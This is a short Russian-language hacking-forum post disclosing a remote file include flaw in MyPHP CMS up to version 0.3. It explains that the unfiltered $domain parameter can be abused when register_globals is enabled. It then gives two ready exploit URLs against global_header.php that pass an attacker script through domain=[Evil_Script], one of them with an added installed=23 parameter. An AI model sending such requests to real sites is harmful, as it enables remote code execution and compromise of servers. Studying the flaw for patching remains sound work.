• XSS.stack #1 – первый литературный журнал от юзеров форума

Web MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
и снова Kw3[R]Ln..
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabili
Описание:
переменная $domain не фильтруется.Когда register_globals=on, то есть возможность использовать эту уязвимость с помощью php injection скрипта.
Пример/эксплоим:
сначала было вот так...
Код:
http://www.site.com/[path]/styles/default/global_header.php?domain=[Evil_Script]
но потом изменилось вот так:
Код:
 http://www.site.com/[path]/styles/default/global_header.php?installed=23&domain=[Evil_Script]
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх